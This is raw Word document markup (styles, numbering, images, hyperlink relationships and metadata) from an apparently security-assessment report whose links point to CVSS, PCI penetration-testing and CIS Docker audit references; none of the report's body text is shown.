    <w:p w14:paraId="0A8C2067" w14:textId="77777777" w:rsidR="00890A70" w:rsidRDefault="00890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37506" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1440"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1257AD78" wp14:editId="48A67DCE">
          <wp:extent cx="7747000" cy="508000"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="2" name="Drawing 2" descr="footerimage"/>
          <wp:cNvGraphicFramePr/>
          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="Picture 2" descr="footerimage"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7747000" cy="50800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EBC24" w14:textId="77777777" w:rsidR="00890A70" w:rsidRDefault="00890A70">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="15D3A215" w14:textId="77777777" w:rsidR="00890A70" w:rsidRDefault="00890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F2A68" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
    <w:pPr>
      <w:ind w:left="-1440"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="635B8DAF" wp14:editId="7BE2B22E">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-914400</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-433705</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7762875" cy="1333500"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapThrough wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="0" y="0"/>
              <wp:lineTo x="0" y="21394"/>
              <wp:lineTo x="21556" y="21394"/>
              <wp:lineTo x="21556" y="0"/>
              <wp:lineTo x="0" y="0"/>
            </wp:wrapPolygon>
          </wp:wrapThrough>
          <wp:docPr id="1628735175" name="Drawing 0" descr="firstimage"/>
          <wp:cNvGraphicFramePr/>
          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="Picture 0" descr="firstimag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62875" cy="13335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DA7A7" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
    <w:pPr>
      <w:ind w:left="-1440"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36351DEE" wp14:editId="2852CF91">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-914400</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-425560</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7762875" cy="1333500"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapThrough wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="0" y="0"/>
              <wp:lineTo x="0" y="21394"/>
              <wp:lineTo x="21556" y="21394"/>
              <wp:lineTo x="21556" y="0"/>
              <wp:lineTo x="0" y="0"/>
            </wp:wrapPolygon>
          </wp:wrapThrough>
          <wp:docPr id="1" name="Drawing 1" descr="firstimage"/>
          <wp:cNvGraphicFramePr/>
          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="Picture 1" descr="firstimag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62875" cy="13335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7027E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DC07E18"/>
    <w:lvl w:ilvl="0" w:tplc="9C92352E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="660" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="501E5BBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="218A14F2"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="50312C4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD688DCA"/>
    <w:lvl w:ilvl="0" w:tplc="08090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1180" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1900" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2620" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3340" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4060" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5500" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6220" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5EDB4DCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31F86BE2"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79421899"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8E6B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7376990">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="277954373">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="480654761">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="301160462">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1985700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604BC"/>
    <w:rsid w:val="0000460D"/>
    <w:rsid w:val="00033501"/>
    <w:rsid w:val="000468CD"/>
    <w:rsid w:val="000777C6"/>
    <w:rsid w:val="0009119E"/>
    <w:rsid w:val="000A0DCF"/>
    <w:rsid w:val="000C5CD8"/>
    <w:rsid w:val="000F0509"/>
    <w:rsid w:val="00131B34"/>
    <w:rsid w:val="00132DA3"/>
    <w:rsid w:val="001467C8"/>
    <w:rsid w:val="0017182D"/>
    <w:rsid w:val="0018245B"/>
    <w:rsid w:val="001B327B"/>
    <w:rsid w:val="001C002E"/>
    <w:rsid w:val="001E1AC0"/>
    <w:rsid w:val="001E6EC4"/>
    <w:rsid w:val="0025219A"/>
    <w:rsid w:val="00281621"/>
    <w:rsid w:val="002A1EBC"/>
    <w:rsid w:val="002A4CF4"/>
    <w:rsid w:val="002C25B8"/>
    <w:rsid w:val="002C3E38"/>
    <w:rsid w:val="002D14F5"/>
    <w:rsid w:val="00301BF3"/>
    <w:rsid w:val="003078CF"/>
    <w:rsid w:val="00307B07"/>
    <w:rsid w:val="00313E72"/>
    <w:rsid w:val="00323D9F"/>
    <w:rsid w:val="003446DD"/>
    <w:rsid w:val="003624A3"/>
    <w:rsid w:val="00373D21"/>
    <w:rsid w:val="003A2180"/>
    <w:rsid w:val="003A7455"/>
    <w:rsid w:val="003B7707"/>
    <w:rsid w:val="003D762D"/>
    <w:rsid w:val="003E2D93"/>
    <w:rsid w:val="003F2D79"/>
    <w:rsid w:val="003F330D"/>
    <w:rsid w:val="00407DA1"/>
    <w:rsid w:val="0044481B"/>
    <w:rsid w:val="00481C04"/>
    <w:rsid w:val="004852A1"/>
    <w:rsid w:val="00496CF9"/>
    <w:rsid w:val="004B06C7"/>
    <w:rsid w:val="004D6986"/>
    <w:rsid w:val="00502BBA"/>
    <w:rsid w:val="00506998"/>
    <w:rsid w:val="005260EA"/>
    <w:rsid w:val="005361B1"/>
    <w:rsid w:val="005514B3"/>
    <w:rsid w:val="00591A2F"/>
    <w:rsid w:val="00591E54"/>
    <w:rsid w:val="005C1BB5"/>
    <w:rsid w:val="005D5728"/>
    <w:rsid w:val="005E715D"/>
    <w:rsid w:val="005F76E2"/>
    <w:rsid w:val="0064392B"/>
    <w:rsid w:val="006600DB"/>
    <w:rsid w:val="006B2FCF"/>
    <w:rsid w:val="006C06F7"/>
    <w:rsid w:val="006C4B14"/>
    <w:rsid w:val="006F05B0"/>
    <w:rsid w:val="006F2F0C"/>
    <w:rsid w:val="00715930"/>
    <w:rsid w:val="00745FCE"/>
    <w:rsid w:val="0076586C"/>
    <w:rsid w:val="007C124E"/>
    <w:rsid w:val="007C631A"/>
    <w:rsid w:val="007D3249"/>
    <w:rsid w:val="007E71FC"/>
    <w:rsid w:val="008012BA"/>
    <w:rsid w:val="00812226"/>
    <w:rsid w:val="00825109"/>
    <w:rsid w:val="00825DC2"/>
    <w:rsid w:val="00853981"/>
    <w:rsid w:val="0088478B"/>
    <w:rsid w:val="00890A70"/>
    <w:rsid w:val="008C3C97"/>
    <w:rsid w:val="008D4522"/>
    <w:rsid w:val="00903808"/>
    <w:rsid w:val="00904F12"/>
    <w:rsid w:val="009101AD"/>
    <w:rsid w:val="009604BC"/>
    <w:rsid w:val="00992248"/>
    <w:rsid w:val="009A3182"/>
    <w:rsid w:val="009D1226"/>
    <w:rsid w:val="009D66AC"/>
    <w:rsid w:val="00A024F9"/>
    <w:rsid w:val="00A21361"/>
    <w:rsid w:val="00A2754E"/>
    <w:rsid w:val="00A47D79"/>
    <w:rsid w:val="00AA768E"/>
    <w:rsid w:val="00AB4EDA"/>
    <w:rsid w:val="00AD4DEB"/>
    <w:rsid w:val="00AE6C82"/>
    <w:rsid w:val="00B11DB6"/>
    <w:rsid w:val="00B12F65"/>
    <w:rsid w:val="00B20E8F"/>
    <w:rsid w:val="00B25578"/>
    <w:rsid w:val="00B36CFB"/>
    <w:rsid w:val="00B41807"/>
    <w:rsid w:val="00B53687"/>
    <w:rsid w:val="00B77438"/>
    <w:rsid w:val="00B90620"/>
    <w:rsid w:val="00BC4DFE"/>
    <w:rsid w:val="00BF24F1"/>
    <w:rsid w:val="00C1536D"/>
    <w:rsid w:val="00C429FC"/>
    <w:rsid w:val="00C558AF"/>
    <w:rsid w:val="00C74C61"/>
    <w:rsid w:val="00CA3EF2"/>
    <w:rsid w:val="00CB2A66"/>
    <w:rsid w:val="00CE6D0D"/>
    <w:rsid w:val="00D04657"/>
    <w:rsid w:val="00D36D1A"/>
    <w:rsid w:val="00D70879"/>
    <w:rsid w:val="00D74B2A"/>
    <w:rsid w:val="00D7582E"/>
    <w:rsid w:val="00D93F49"/>
    <w:rsid w:val="00DB00AB"/>
    <w:rsid w:val="00DB1C4E"/>
    <w:rsid w:val="00DB338C"/>
    <w:rsid w:val="00E066AA"/>
    <w:rsid w:val="00E363E4"/>
    <w:rsid w:val="00E75B86"/>
    <w:rsid w:val="00E77A74"/>
    <w:rsid w:val="00EC6321"/>
    <w:rsid w:val="00ED40B2"/>
    <w:rsid w:val="00EF2706"/>
    <w:rsid w:val="00F0465F"/>
    <w:rsid w:val="00F055B4"/>
    <w:rsid w:val="00F0732F"/>
    <w:rsid w:val="00F1460C"/>
    <w:rsid w:val="00F50747"/>
    <w:rsid w:val="00F73A60"/>
    <w:rsid w:val="00F857E2"/>
    <w:rsid w:val="00F85EDF"/>
    <w:rsid w:val="00F9075A"/>
    <w:rsid w:val="00F96D7F"/>
    <w:rsid w:val="00FB32DD"/>
    <w:rsid w:val="00FF01A1"/>
    <w:rsid w:val="00FF11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561D8"/>
  <w15:docId w15:val="{EF3A7AC4-3CE5-8247-883A-85B86ACD4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uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="heading2">
    <w:name w:val="heading2"/>
    <w:uiPriority w:val="2"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="heading3">
    <w:name w:val="heading3"/>
    <w:uiPriority w:val="3"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BA"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00591E54"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000C5CD8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F146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60C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F146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isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://9.114.12.78:46443/sss/v3/copy_ssh_id" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><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isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects"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isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects"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0.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sljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects"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2.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.appsealing.com/code-obfuscation/"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first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tenable.com/audits/items/CIS_Docker_Community_Edition_L1_Docker_v1.1.0.audit:b6e68c652c1bc572fa9d41212ae84895" TargetMode="External"/><Relationship Id="rId76"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isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects" TargetMode="Externa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image" Target="media/image24.png"/><Relationship Id="rId87"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50</Pages>
  <Words>8486</Words>
  <Characters>48373</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>403</Lines>
  <Paragraphs>113</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>56746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Praveen K V</cp:lastModifiedBy>
  <cp:revision>172</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-10T13:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-11T14:03:00Z</dcterms:modified>
